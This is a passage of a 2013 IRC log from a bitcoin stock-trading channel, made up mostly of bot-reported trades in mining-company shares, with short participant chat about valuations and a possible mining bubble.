50 @ 0.0315 = 1.575 BTC [-] Aug 21 20:58:55 [BTCTC] [TAT.ASICMINER] 1 @ 0.03146 BTC [-] Aug 21 20:58:56 [BTCTC] [TAT.ASICMINER] 9 @ 0.03145 = 0.2831 BTC [-] Aug 21 21:00:01 [BTCTC] [ASICMINER-PT] 6 @ 3.03 = 18.18 BTC [-] Aug 21 21:00:03 [BTCTC] [ASICMINER-PT] 4 @ 3.02 = 12.08 BTC [-] Aug 21 21:01:35 [BTCTC] [NASTY-PT] 6 @ 0.003299 = 0.0198 BTC [-] Aug 21 21:01:37 [BTCTC] [NASTY-PT] 1 @ 0.003235 BTC [-] Aug 21 21:01:39 [BTCTC] [NASTY-PT] 1 @ 0.003001 BTC [-] Aug 21 21:01:40 [BTCTC] [NASTY-PT] 1 @ 0.002799 BTC [-] Aug 21 21:03:29 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.001491 = 0.003 BTC [+] Aug 21 21:03:32 [BTCTC] [BASIC-MINING] 16 @ 0.2384 = 3.8144 BTC [+] Aug 21 21:03:46 [BTCTC] [RSM] 15 @ 0.0096 = 0.144 BTC [-] Aug 21 21:03:47 [BTCTC] [RSM] 50 @ 0.0095 = 0.475 BTC [-] Aug 21 21:04:04 [HAVELOCK] [AM100] 1 @ 0.032689 BTC [-] Aug 21 21:04:19 [BTCTC] [BASIC-MINING] 3 @ 0.2385 = 0.7155 BTC [+] Aug 21 21:04:24 [HAVELOCK] [AM100] 4 @ 0.032689 = 0.1308 BTC [-] Aug 21 21:04:36 [BTCTC] [LABCOIN] 1 @ 0.017 BTC [+] Aug 21 21:04:54 wtf Aug 21 21:05:26 <@assbot> [BTCTC] [LABCOIN] 1 @ 0.017 BTC [+] Aug 21 21:06:04 option exercised Aug 21 21:06:13 oic Aug 21 21:06:23 there will be more uc from labcoin! Aug 21 21:06:46 uc? Aug 21 21:06:53 sry i'ma noob Aug 21 21:07:28 yeah we should say its an option not a trade Aug 21 21:07:36 prolly Aug 21 21:07:41 an option is a trade Aug 21 21:07:55 well you get my point Aug 21 21:08:29 [BTCTC] [DMS.MINING] 1 @ 0.00331 BTC [-] Aug 21 21:08:31 [BTCTC] [DMS.MINING] 1 @ 0.00331 BTC [-] Aug 21 21:08:32 [BTCTC] [DMS.MINING] 3 @ 0.0033 = 0.0099 BTC [-] Aug 21 21:08:33 [BTCTC] [DMS.MINING] 8 @ 0.003221 = 0.0258 BTC [-] Aug 21 21:08:35 [BTCTC] [DMS.MINING] 123 @ 0.003221 = 0.3962 BTC [-] Aug 21 21:08:36 [BTCTC] [DMS.MINING] 9 @ 0.00322 = 0.029 BTC [-] Aug 21 21:09:19 [BTCTC] [ASICMINER-PT] 1 @ 3.093 BTC [+] Aug 21 21:10:59 [BTCTC] [LABCOIN] 383 @ 0.002394 = 0.9169 BTC [-] Aug 21 21:11:00 [BTCTC] [LABCOIN] 75 @ 0.002395 = 0.1796 BTC [+] Aug 21 21:11:02 [BTCTC] [LABCOIN] 1307 @ 0.002395 = 3.1303 BTC [+] Aug 21 21:12:18 [BTCTC] [LABCOIN] 20 @ 0.002358 = 0.0472 BTC [-] Aug 21 21:14:58 [HAVELOCK] [AM100] 1 @ 0.03269 BTC [+] Aug 21 21:15:13 [HAVELOCK] [AM100] 1 @ 0.03269 BTC [+] Aug 21 21:16:20 bratislava representin http://allthingsbitcoin.org/2013/08/21/bitcoin-boom-us-fears-digital-currency-may-hit-dollar-demand/ Aug 21 21:16:54 whats going on guys Aug 21 21:17:13 [BTCTC] [DMS.SELLING] 30 @ 0.01748 = 0.5244 BTC [-] Aug 21 21:18:14 [BTCTC] [TAT.ASICMINER] 50 @ 0.03105 = 1.5525 BTC [-] Aug 21 21:18:57 [BTCTC] [TAT.ASICMINER] 25 @ 0.03105 = 0.7763 BTC [-] Aug 21 21:19:00 nothing much. Aug 21 21:19:22 it's so quiet in here Aug 21 21:19:22 haha Aug 21 21:19:25 first time in here Aug 21 21:20:12 [BTCTC] [BASIC-MINING] 1 @ 0.25 BTC [+] Aug 21 21:20:15 [BTCTC] [LABCOIN] 4 @ 0.002394 = 0.0096 BTC [+] Aug 21 21:21:06 mircea_popescu , would you mind reading this - what would you change? Aug 21 21:21:10 http://bcoinnews.com/overclock-blade/ Aug 21 21:22:56 prolly not the guy to ask, i don't know much about hardware and never overclocked anything Aug 21 21:23:21 Just the writing Aug 21 21:23:56 [BTCTC] [TAT.ASICMINER] 10 @ 0.03105 = 0.3105 BTC [-] Aug 21 21:23:58 [BTCTC] [TAT.ASICMINER] 50 @ 0.03105 = 1.5525 BTC [-] Aug 21 21:23:58 [BTCTC] [TAT.ASICMINER] 2 @ 0.03103 = 0.0621 BTC [-] Aug 21 21:23:59 [BTCTC] [TAT.ASICMINER] 17 @ 0.03032 = 0.5154 BTC [-] Aug 21 21:24:00 [BTCTC] [TAT.ASICMINER] 11 @ 0.03031 = 0.3334 BTC [-] Aug 21 21:24:08 [BTCTC] [KENILWORTH] 1 @ 0.001795 BTC [+] Aug 21 21:24:42 [BTCTC] [ASICMINER-PT] 1 @ 3.097 BTC [+] Aug 21 21:24:57 [BTCTC] [ASICMINER-PT] 1 @ 3.098 BTC [+] Aug 21 21:24:58 [BTCTC] [ASICMINER-PT] 2 @ 3.1 = 6.2 BTC [+] Aug 21 21:24:58 http://gawker.com/classy-bride-dances-down-the-aisle-to-crazy-bitch-bec-1177681201 <= because america Aug 21 21:25:02 Classy Bride Dances Down the Aisle to 'Crazy Bitch' Because USA Aug 21 21:25:24 mjr_1: do me a favor Aug 21 21:25:24 i know that they know that i know that they know my surfing habits Aug 21 21:25:27 dont post useless urls in here Aug 21 21:25:28 cheers NSA **** BEGIN LOGGING AT Wed Aug 21 21:29:31 2013 Aug 21 21:30:10 [BTCTC] [ASICMINER-PT] 1 @ 3.138 BTC [+] Aug 21 21:30:11 [BTCTC] [ASICMINER-PT] 1 @ 3.14 BTC [+] Aug 21 21:30:26 [BTCTC] [TAT.ASICMINER] 6 @ 0.0316 = 0.1896 BTC [+] Aug 21 21:30:28 [BTCTC] [TAT.ASICMINER] 67 @ 0.03161 = 2.1179 BTC [+] Aug 21 21:30:29 [BTCTC] [TAT.ASICMINER] 12 @ 0.03162 = 0.3794 BTC [+] Aug 21 21:31:20 [BTCTC] [BASIC-MINING] 5 @ 0.2712 = 1.356 BTC [+] Aug 21 21:31:21 [BTCTC] [DMS.MINING] 1 @ 0.003399 BTC [+] Aug 21 21:35:33 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001485 BTC [-] Aug 21 21:37:36 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.001485 = 0.0074 BTC [-] Aug 21 21:46:44 [BTCTC] [ACTIVEMINING] 68 @ 0.00517 = 0.3516 BTC [+] Aug 21 21:46:45 [BTCTC] [ACTIVEMINING] 19 @ 0.005172 = 0.0983 BTC [+] Aug 21 21:46:47 [BTCTC] [ACTIVEMINING] 13 @ 0.005173 = 0.0672 BTC [+] Aug 21 21:48:46 .d Aug 21 21:48:46 50810339.04828 | Next Diff in 571 blocks | Estimated Change: 25.1030% in 2d 23h 7m 21s Aug 21 21:48:50 [HAVELOCK] [CFIG] 4 @ 0.15 = 0.6 BTC Aug 21 21:48:59 [BTCTC] [ACTIVEMINING] 30 @ 0.005013 = 0.1504 BTC [-] Aug 21 21:49:01 [BTCTC] [ACTIVEMINING] 1 @ 0.005012 BTC [-] Aug 21 21:49:02 [BTCTC] [ACTIVEMINING] 2 @ 0.005012 = 0.01 BTC [-] Aug 21 21:49:03 [BTCTC] [ACTIVEMINING] 95 @ 0.00501 = 0.476 BTC [-] Aug 21 21:49:04 [BTCTC] [ACTIVEMINING] 100 @ 0.005001 = 0.5001 BTC [-] Aug 21 21:49:06 [BTCTC] [ACTIVEMINING] 652 @ 0.005 = 3.26 BTC [-] Aug 21 21:49:12 [BTCTC] [ACTIVEMINING] 700 @ 0.004959 = 3.4713 BTC [-] Aug 21 21:49:12 [BTCTC] [ACTIVEMINING] 245 @ 0.00495 = 1.2128 BTC [-] Aug 21 21:49:14 [BTCTC] [ACTIVEMINING] 2 @ 0.004903 = 0.0098 BTC [-] Aug 21 21:49:15 [BTCTC] [ACTIVEMINING] 173 @ 0.004901 = 0.8479 BTC [-] Aug 21 21:51:59 [HAVELOCK] [CFIG] 2 @ 0.15 = 0.3 BTC Aug 21 21:53:10 [BTCTC] [DMS.MINING] 3 @ 0.003394 = 0.0102 BTC [-] Aug 21 21:54:06 [BTCTC] [LABCOIN] 61 @ 0.002365 = 0.1443 BTC [-] Aug 21 21:54:23 [BTCTC] [BASIC-MINING] 5 @ 0.2712 = 1.356 BTC [+] Aug 21 21:54:24 [BTCTC] [BASIC-MINING] 60 @ 0.2713 = 16.278 BTC [+] Aug 21 21:54:37 [BTCTC] [ACTIVEMINING] 30 @ 0.004918 = 0.1475 BTC [+] Aug 21 21:54:38 [BTCTC] [ACTIVEMINING] 68 @ 0.004917 = 0.3344 BTC [-] Aug 21 21:55:15 [BTCTC] [ACTIVEMINING] 15 @ 0.004902 = 0.0735 BTC [-] Aug 21 21:55:46 [BTCTC] [BASIC-MINING] 30 @ 0.2711 = 8.133 BTC [-] Aug 21 21:55:57 [BTCTC] [ACTIVEMINING] 537 @ 0.004901 = 2.6318 BTC [-] Aug 21 21:56:23 [HAVELOCK] [SDSTM] 1 @ 0.0039 BTC [+] Aug 21 21:56:50 [MPEX] [S.MPOE] 13266 @ 0.0008281 = 10.9856 BTC [-] Aug 21 21:57:21 [BTCTC] [BASIC-MINING] 20 @ 0.2711 = 5.422 BTC [-] **** BEGIN LOGGING AT Wed Aug 21 22:00:28 2013 Aug 21 22:01:46 [HAVELOCK] [AM100] 6 @ 0.0327 = 0.1962 BTC [+] Aug 21 22:03:18 [BTCTC] [ASICMINER-PT] 1 @ 3.193 BTC [+] Aug 21 22:04:26 [HAVELOCK] [AM100] 5 @ 0.0318 = 0.159 BTC [-] Aug 21 22:04:26 [HAVELOCK] [AM100] 5 @ 0.0317 = 0.1585 BTC [-] Aug 21 22:04:28 [HAVELOCK] [AM100] 5 @ 0.0306 = 0.153 BTC [-] Aug 21 22:04:30 [HAVELOCK] [AM100] 5 @ 0.03051 = 0.1526 BTC [-] Aug 21 22:04:32 [HAVELOCK] [AM100] 5 @ 0.03051 = 0.1526 BTC [-] Aug 21 22:04:33 [HAVELOCK] [AM100] 4 @ 0.03051 = 0.122 BTC [-] Aug 21 22:04:35 [HAVELOCK] [AM100] 30 @ 0.0305 = 0.915 BTC [-] Aug 21 22:04:37 [HAVELOCK] [AM100] 10 @ 0.0301 = 0.301 BTC [-] Aug 21 22:04:39 [HAVELOCK] [AM100] 16 @ 0.02951 = 0.4722 BTC [-] Aug 21 22:04:41 [HAVELOCK] [AM100] 50 @ 0.0295 = 1.475 BTC [-] Aug 21 22:04:44 [HAVELOCK] [AM100] 30 @ 0.029205 = 0.8762 BTC [-] Aug 21 22:05:02 [HAVELOCK] [AM100] 1 @ 0.0292 BTC [-] Aug 21 22:05:52 [BTCTC] [ASICMINER-PT] 1 @ 3.121 BTC [-] Aug 21 22:05:54 [BTCTC] [ASICMINER-PT] 1 @ 3.12 BTC [-] Aug 21 22:05:55 [BTCTC] [ASICMINER-PT] 1 @ 3.11 BTC [-] Aug 21 22:05:56 [BTCTC] [ASICMINER-PT] 1 @ 3.101 BTC [-] Aug 21 22:06:42 [HAVELOCK] [AM100] 5 @ 0.02911001 = 0.1456 BTC [-] Aug 21 22:06:44 [HAVELOCK] [AM100] 5 @ 0.0291 = 0.1455 BTC [-] Aug 21 22:07:06 [BTCTC] [ACTIVEMINING] 1438 @ 0.004901 = 7.0476 BTC [-] Aug 21 22:07:08 [BTCTC] [ACTIVEMINING] 62 @ 0.0049 = 0.3038 BTC [-] Aug 21 22:08:10 [BTCTC] [BTC-GROWTH] 5 @ 0.09755 = 0.4878 BTC [+] Aug 21 22:09:05 [BTCTC] [LABCOIN] 388 @ 0.002365 = 0.9176 BTC [-] Aug 21 22:09:33 [BTCTC] [LABCOIN] 350 @ 0.002365 = 0.8278 BTC [-] Aug 21 22:09:36 [BTCTC] [TAT.ASICMINER] 67 @ 0.03119 = 2.0897 BTC [-] Aug 21 22:09:51 [BTCTC] [LABCOIN] 1201 @ 0.002365 = 2.8404 BTC [-] Aug 21 22:11:20 [BTCTC] [BTC-GROWTH] 5 @ 0.09755 = 0.4878 BTC [+] Aug 21 22:11:58 [BTCTC] [BTC-GROWTH] 61 @ 0.0972 = 5.9292 BTC [-] Aug 21 22:12:16 [BTCTC] [DMS.SELLING] 70 @ 0.01748 = 1.2236 BTC [-] Aug 21 22:14:03 [HAVELOCK] [AM100] 1 @ 0.0325 BTC [+] Aug 21 22:15:52 [HAVELOCK] [AM100] 1 @ 0.0325 BTC [+] Aug 21 22:16:46 [BTCTC] [TAT.ASICMINER] 1 @ 0.03115 BTC [-] Aug 21 22:18:43 [BTCTC] [ACTIVEMINING] 30 @ 0.004962 = 0.1489 BTC [+] Aug 21 22:18:44 [BTCTC] [ACTIVEMINING] 6 @ 0.004963 = 0.0298 BTC [+] Aug 21 22:19:14 [BTCTC] [DMS.SELLING] 50 @ 0.0172 = 0.86 BTC [-] Aug 21 22:21:53 [HAVELOCK] [HIM] 1 @ 0.1895 BTC [+] Aug 21 22:26:22 [HAVELOCK] [AM100] 2 @ 0.0325 = 0.065 BTC [+] Aug 21 22:26:27 [BTCTC] [BASIC-MINING] 1 @ 0.2799 BTC [+] Aug 21 22:26:38 [BTCTC] [BTC-BOND] 1 @ 0.009999 BTC [+] Aug 21 22:27:02 [HAVELOCK] [AM100] 10 @ 0.0325 = 0.325 BTC [+] Aug 21 22:27:23 [BTCTC] [TAT.ASICMINER] 61 @ 0.03057 = 1.8648 BTC [-] Aug 21 22:28:58 [BTCTC] [ACTIVEMINING] 25 @ 0.00501 = 0.1253 BTC [+] Aug 21 22:29:46 [BTCTC] [TAT.ASICMINER] 7 @ 0.03057 = 0.214 BTC [-] Aug 21 22:30:00 [BTCTC] [ACTIVEMINING] 24 @ 0.00501 = 0.1202 BTC [+] Aug 21 22:31:46 [HAVELOCK] [AM100] 4 @ 0.0292 = 0.1168 BTC [-] Aug 21 22:31:49 [HAVELOCK] [AM100] 146 @ 0.02910001 = 4.2486 BTC [-] Aug 21 22:33:57 [BTCTC] [BASIC-MINING] 1 @ 0.2581 BTC [-] Aug 21 22:34:31 [HAVELOCK] [AM100] 5 @ 0.03249988 = 0.1625 BTC [+] Aug 21 22:34:46 [HAVELOCK] [AM100] 4 @ 0.0324999 = 0.13 BTC [+] Aug 21 22:35:38 [BTCTC] [LABCOIN] 30 @ 0.002346 = 0.0704 BTC [-] Aug 21 22:35:42 [BTCTC] [LABCOIN] 6 @ 0.002346 = 0.0141 BTC [-] Aug 21 22:36:05 Wanted to share this gem: "Mining is overhyped, difficulty is rising too rapidly for any of you to ever see you money back. All mining stocks are overpriced. The guy who runs DMS.Mining got drunk and ranted about this on bitcointalk.org, telling people how most of them will never see their money back, wasting it all on worthless mining products. Aug 21 22:36:05 I'm really sorry. Mining is in a bubble right now." Aug 21 22:36:18 [BTCTC] [LABCOIN] 15 @ 0.002384 = 0.0358 BTC [+] Aug 21 22:36:19 [BTCTC] [LABCOIN] 75 @ 0.002385 = 0.1789 BTC [+] Aug 21 22:36:37 xpost from /r/bitcoinstocks Aug 21 22:36:39 [BTCTC] [TAT.ASICMINER] 67 @ 0.03056 = 2.0475 BTC [-] Aug 21 22:37:28 i thought deprived ran dms.* Aug 21 22:38:33 [HAVELOCK] [AM100] 5 @ 0.0301 = 0.1505 BTC [-] Aug 21 22:38:36 [HAVELOCK] [AM100] 1 @ 0.03 BTC [-] Aug 21 22:38:41 It's tricky, because isn't mining also the biggest cashflow earning sector of the bitcoin economy? Aug 21 22:39:13 I think "Ponzi scheme" still holds that title, qxzn. :D Aug 21 22:39:33 fair. Aug 21 22:39:42 [HAVELOCK] [AM100] 5 @ 0.03 = 0.15 BTC [-] Aug 21 22:40:04 y'know, if i had 1000 AM shares, i'd set up a lowball auction where bidders have to PM me Aug 21 22:40:19 and then i'd just scoop up wheelbarrows full of shares from the exchanges Aug 21 22:40:27 but last time I calc'd on the back of an envelope, I discovered that mining was generating nearly 10x the revenues of the exchanges. Aug 21 22:41:44 [HAVELOCK] [XBOND] 350 @ 0.001145 = 0.4008 BTC [-] Aug 21 22:42:41 [BTCTC] [TAT.ASICMINER] 2 @ 0.03101 = 0.062 BTC [+] Aug 21 22:43:14 http://blockchain.info/stats Aug 21 22:43:15 [BTCTC] [DMS.MINING] 1 @ 0.003394 BTC [-] Aug 21 22:43:16 Bitcoin Statistics - Blockchain.info Aug 21 22:43:59 [BTCTC] [ACTIVEMINING] 4 @ 0.005011 = 0.02 BTC [+] Aug 21 22:44:09 [BTCTC] [BASIC-MINING] 3 @ 0.2587 = 0.7761 BTC [+] Aug 21 22:44:11 [BTCTC] [BASIC-MINING] 15 @ 0.2586 = 3.879 BTC [-] Aug 21 22:44:12 [BTCTC] [BASIC-MINING] 1 @ 0.2568 BTC [-] Aug 21 22:44:23 qxzn mining has so far made ~13mn btc. Aug 21 22:44:33 this is unparalleled, by about a degree of magnitude or two. Aug 21 22:45:45 [BTCTC] [ACTIVEMINING] 124 @ 0.005011 = 0.6214 BTC [+] Aug 21 22:46:16 [MPEX] [S.MPOE] 17813 @ 0.00083189 = 14.8185 BTC [+] Aug 21 22:47:03 [BTCTC] [ACTIVEMINING] 30 @ 0.005099 = 0.153 BTC [+] Aug 21 22:47:04 [BTCTC] [ACTIVEMINING] 471 @ 0.0051 = 2.4021 BTC [+] Aug 21 22:47:14 Yup. Aug 21 22:48:30 [HAVELOCK] [AM100] 5 @ 0.02999 = 0.15 BTC [-] Aug 21 22:48:45 what the crap happened to nasty-mining? Aug 21 22:48:51 tanked to hell Aug 21 22:49:04 Many stocks are oversold, currently. Aug 21 22:49:14 mircea_popescu: dexX7 https://bitcointalk.org/index.php?topic=144319.msg1530287#msg1530287 << ty - following this approach based on last div (am: 4904 btc/week + sd: 4988 btc/month = 1247 btc/week, trading at .0025/share), am should trade at 100000000/400000*4904/1247*0.0025 = 2.458 btc Aug 21 22:49:19 mircea_popescu: transfered to the times where sd was traded between .003-.006 and made 10k/month, am would be valued between ~1.5-3 for the current 3 month low of ~200k/month. to get near to sub 1.5 in this comparison, am would need to stop all sales and mine with less than ~10 % nethash rate --- tl;tr: even with girly logic applied, we are currently in an area where we should be Aug 21 22:51:38 [BTCTC] [DMS.MINING] 12 @ 0.003394 = 0.0407 BTC [-] Aug 21 22:52:48 dexX7 mining companies do not pay dividends. Aug 21 22:52:57 minign companies pay amortisation on their capital + some dividend. Aug 21 22:53:13 by this logic the 12 am paid is about 10 that you lost and about 2 in dividend. Aug 21 22:57:32 [HAVELOCK] [CFIG] 11 @ 0.15 = 1.65 BTC Aug 21 22:58:20 [HAVELOCK] [AM100] 5 @ 0.0292 = 0.146 BTC [-] Aug 21 22:58:22 [HAVELOCK] [AM100] 20 @ 0.02910002 = 0.582 BTC [-] Aug 21 22:58:24 [HAVELOCK] [AM100] 34 @ 0.02910001 = 0.9894 BTC [-] Aug 21 22:58:27 [HAVELOCK] [AM100] 41 @ 0.0291 = 1.1931 BTC [-] Aug 21 22:59:07 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1951 BTC [-] Aug 21 22:59:30 [BTCTC] [LABCOIN] 30 @ 0.002347 = 0.0704 BTC [-] Aug 21 23:01:16 [BTCTC] [DMS.MINING] 88 @ 0.003394 = 0.2987 BTC [-] Aug 21 23:01:45 [BTCTC] [DMS.MINING] 29 @ 0.0034 = 0.0986 BTC [+] Aug 21 23:01:47 [BTCTC] [LABCOIN] 30 @ 0.00231 = 0.0693 BTC [-] Aug 21 23:01:53 [BTCTC] [LABCOIN] 85 @ 0.00231 = 0.1964 BTC [-] Aug 21 23:02:15 [BTCTC] [TAT.ASICMINER] 3 @ 0.03056 = 0.0917 BTC [-] Aug 21 23:02:49 well, it doesn't matter how you name it, the initial assumption of 15 mined blocks/day => 0.75-1.5 btc/share would obviously only apply, if am would indeed only mines 15 blocks/day with no additional income, which is not the case at the moment Aug 21 23:03:18 [BTCTC] [TAT.ASICMINER] 10 @ 0.03056 = 0.3056 BTC [-] Aug 21 23:03:47 [MPEX] [S.MPOE] 734 @ 0.00082852 = 0.6081 BTC [-] Aug 21 23:03:48 [MPEX] [S.MPOE] 10207 @ 0.00082808 = 8.4522 BTC [-] Aug 21 23:04:00 [BTCTC] [TAT.ASICMINER] 19 @ 0.03032 = 0.5761 BTC [-] Aug 21 23:04:05 late august is not mid may. Aug 21 23:04:08 [BTCTC] [DMS.PURCHASE] 1 @ 0.02061 BTC [+] Aug 21 23:04:11 [BTCTC] [DMS.SELLING] 52 @ 0.0172 = 0.8944 BTC [-] Aug 21 23:04:23 [BTCTC] [ASICMINER-PT] 1 @ 3.164 BTC [+] Aug 21 23:04:25 [BTCTC] [ASICMINER-PT] 1 @ 3.165 BTC [+] Aug 21 23:04:25 [BTCTC] [ASICMINER-PT] 1 @ 3.168 BTC [+] Aug 21 23:04:44 [BTCTC] [DMS.MINING] 80 @ 0.0034 = 0.272 BTC [+] Aug 21 23:05:41 [BTCTC] [LABCOIN] 207 @ 0.00231 = 0.4782 BTC [-] Aug 21 23:05:56 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.001491 = 0.003 BTC [+] Aug 21 23:06:05 [BTCTC] [TAT.ASICMINER] 3 @ 0.03031 = 0.0909 BTC [-] Aug 21 23:06:06 [BTCTC] [TAT.ASICMINER] 6 @ 0.03031 = 0.1819 BTC [-] Aug 21 23:07:08 [BTCTC] [TAT.ASICMINER] 16 @ 0.03032 = 0.4851 BTC [+] Aug 21 23:07:10 [BTCTC] [TAT.ASICMINER] 13 @ 0.03032 = 0.3942 BTC [+] Aug 21 23:07:40 [BTCTC] [ACTIVEMINING] 30 @ 0.00509 = 0.1527 BTC [-] Aug 21 23:07:40 [BTCTC] [ACTIVEMINING] 6 @ 0.005091 = 0.0305 BTC [+] Aug 21 23:07:42 [BTCTC] [ACTIVEMINING] 364 @ 0.005098 = 1.8557 BTC [+] Aug 21 23:07:43 [BTCTC] [ACTIVEMINING] 1000 @ 0.005099 = 5.099 BTC [+] Aug 21 23:07:44 [BTCTC] [DMS.PURCHASE] 50 @ 0.02061 = 1.0305 BTC [+] Aug 21 23:07:45 [BTCTC] [ACTIVEMINING] 560 @ 0.0051 = 2.856 BTC [+] Aug 21 23:07:47 [BTCTC] [ASICMINER-PT] 1 @ 3.035 BTC [-] Aug 21 23:07:48 [BTCTC] [ASICMINER-PT] 1 @ 3.034 BTC [-] Aug 21 23:07:49 [BTCTC] [ASICMINER-PT] 1 @ 3.033 BTC [-] Aug 21 23:07:51 [BTCTC] [ASICMINER-PT] 1 @ 3.032 BTC [-] Aug 21 23:07:52 [BTCTC] [ASICMINER-PT] 1 @ 3.031 BTC [-] Aug 21 23:07:53 [BTCTC] [ASICMINER-PT] 2 @ 3.022 = 6.044 BTC [-] Aug 21 23:07:53 [BTCTC] [ASICMINER-PT] 1 @ 3.021 BTC [-] Aug 21 23:07:54 [BTCTC] [ASICMINER-PT] 1 @ 3.001 BTC [-] Aug 21 23:07:55 [BTCTC] [ASICMINER-PT] 1 @ 3 BTC [-] Aug 21 23:07:57 [BTCTC] [TAT.ASICMINER] 45 @ 0.03032 = 1.3644 BTC [+] Aug 21 23:08:08 [BTCTC] [TAT.ASICMINER] 2 @ 0.03031 = 0.0606 BTC [-] Aug 21 23:09:16 [BTCTC] [DMS.SELLING] 35 @ 0.01777 = 0.622 BTC [+] Aug 21 23:09:28 [BTCTC] [ASICMINER-PT] 1 @ 3.001 BTC [+] Aug 21 23:09:29 [HAVELOCK] [AM100] 20 @ 0.0292 = 0.584 BTC [+] Aug 21 23:09:32 [BTCTC] [ASICMINER-PT] 2 @ 3 = 6 BTC [-] Aug 21 23:09:33 [BTCTC] [ASICMINER-PT] 1 @ 3 BTC [-] Aug 21 23:09:57 [BTCTC] [DMS.SELLING] 25 @ 0.01778 = 0.4445 BTC [+] Aug 21 23:10:12 [HAVELOCK] [AM100] 1 @ 0.02910002 BTC [-] Aug 21 23:10:19 [HAVELOCK] [AM100] 10 @ 0.02910001 = 0.291 BTC [-] Aug 21 23:10:53 [HAVELOCK] [AM100] 256 @ 0.0291 = 7.4496 BTC [-] Aug 21 23:11:39 [BTCTC] [ASICMINER-PT] 1 @ 3 BTC [-] Aug 21 23:12:01 [BTCTC] [BASIC-MINING] 2 @ 0.2774 = 0.5548 BTC [+] Aug 21 23:12:59 [BTCTC] [BASIC-MINING] 5 @ 0.2775 = 1.3875 BTC [+] Aug 21 23:14:55 [HAVELOCK] [AM100] 198 @ 0.0291 = 5.7618 BTC [-] Aug 21 23:18:09 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.001491 = 0.0134 BTC [+] Aug 21 23:18:11 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001491 BTC [+] Aug 21 23:18:13 uh oh. sub-3 AM? Aug 21 23:18:41 all day. Aug 21 23:19:30 dropppppping hard. Aug 21 23:19:36 [BTCTC] [ACTIVEMINING] 15 @ 0.005021 = 0.0753 BTC [-] Aug 21 23:19:37 [BTCTC] [ACTIVEMINING] 250 @ 0.00502 = 1.255 BTC [-] Aug 21 23:21:19 [BTCTC] [TAT.ASICMINER] 20 @ 0.0303 = 0.606 BTC [-] Aug 21 23:24:43 [BTCTC] [TAT.ASICMINER] 2 @ 0.03031 = 0.0606 BTC [+] Aug 21 23:25:31 AM has been comparatively quiet these days Aug 21 23:25:51 [BTCTC] [LABCOIN] 63 @ 0.002383 = 0.1501 BTC [+] Aug 21 23:25:52 to the new ventures Aug 21 23:25:56 yeah Aug 21 23:26:05 I think friedcat has to kick shit up a gear Aug 21 23:26:17 well he may be Aug 21 23:26:53 [HAVELOCK] [AM100] 5 @ 0.02999 = 0.15 BTC [+] Aug 21 23:26:56 [HAVELOCK] [AM100] 5 @ 0.02999 = 0.15 BTC [+] Aug 21 23:27:11 [BTCTC] [LABCOIN] 1 @ 0.002358 BTC [-] Aug 21 23:27:12 [BTCTC] [LABCOIN] 20 @ 0.002357 = 0.0471 BTC [-] Aug 21 23:27:14 [BTCTC] [LABCOIN] 1 @ 0.002355 BTC [-] Aug 21 23:27:15 [BTCTC] [LABCOIN] 1 @ 0.00235 BTC [-] Aug 21 23:27:25 shrug Aug 21 23:27:31 call me when the share price halves Aug 21 23:27:40 1.5? Aug 21 23:27:47 if you're panicking over sub-3 shares, you bought too late :P Aug 21 23:28:04 [BTCTC] [TAT.ASICMINER] 3 @ 0.03031 = 0.0909 BTC [+] Aug 21 23:28:05 [BTCTC] [TAT.ASICMINER] 12 @ 0.03032 = 0.3638 BTC [+] Aug 21 23:29:14 [BTCTC] [LABCOIN] 62 @ 0.00235 = 0.1457 BTC [-] Aug 21 23:29:14 [BTCTC] [LABCOIN] 4038 @ 0.002383 = 9.6226 BTC [+] Aug 21 23:29:15 [BTCTC] [LABCOIN] 995 @ 0.002384 = 2.3721 BTC [+] Aug 21 23:29:17 [BTCTC] [LABCOIN] 125 @ 0.002385 = 0.2981 BTC [+] Aug 21 23:29:18 [BTCTC] [LABCOIN] 3780 @ 0.002385 = 9.0153 BTC [+] Aug 21 23:29:48 [BTCTC] [TAT.ASICMINER] 52 @ 0.03032 = 1.5766 BTC [+] Aug 21 23:30:15 [HAVELOCK] [XBOND] 2 @ 0.001145 = 0.0023 BTC [-] Aug 21 23:30:54 [BTCTC] [ACTIVEMINING] 100 @ 0.00501 = 0.501 BTC [-] Aug 21 23:30:56 [BTCTC] [TAT.VIRTUALMINE] 19 @ 0.001492 = 0.0283 BTC [+] Aug 21 23:32:03 scratch a bear, go to jael Aug 21 23:32:31 [BTCTC] [TAT.VIRTUALMINE] 200 @ 0.0015 = 0.3 BTC [+] Aug 21 23:32:32 [BTCTC] [LABCOIN] 30 @ 0.002346 = 0.0704 BTC [-] Aug 21 23:32:38 [BTCTC] [LABCOIN] 1 @ 0.002345 BTC [-] Aug 21 23:32:39 [BTCTC] [LABCOIN] 137 @ 0.002306 = 0.3159 BTC [-] Aug 21 23:32:40 [BTCTC] [LABCOIN] 80 @ 0.002306 = 0.1845 BTC [-] Aug 21 23:32:41 [BTCTC] [LABCOIN] 1100 @ 0.002305 = 2.5355 BTC [-] Aug 21 23:33:31 [BTCTC] [TAT.VIRTUALMINE] 200 @ 0.0015 = 0.3 BTC [+] Aug 21 23:33:40 [BTCTC] [DMS.PURCHASE] 484 @ 0.02061 = 9.9752 BTC [+] Aug 21 23:34:21 [BTCTC] [TAT.VIRTUALMINE] 86 @ 0.0015 = 0.129 BTC [+] Aug 21 23:35:08 [HAVELOCK] [AM100] 53 @ 0.02999 = 1.5895 BTC [+] Aug 21 23:36:49 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.001531 = 0.0092 BTC [+] Aug 21 23:37:48 [BTCTC] [ACTIVEMINING] 51 @ 0.00501 = 0.2555 BTC [-] Aug 21 23:38:59 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00157 = 0.0157 BTC [+] Aug 21 23:40:03 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.001571 = 0.1571 BTC [+] Aug 21 23:41:33 [BTCTC] [TAT.ASICMINER] 4 @ 0.03085 = 0.1234 BTC [+] Aug 21 23:42:11 [BTCTC] [TAT.ASICMINER] 5 @ 0.03084 = 0.1542 BTC [-] Aug 21 23:42:12 [BTCTC] [TAT.ASICMINER] 58 @ 0.03085 = 1.7893 BTC [+] Aug 21 23:42:49 [BTCTC] [TAT.ASICMINER] 5 @ 0.03085 = 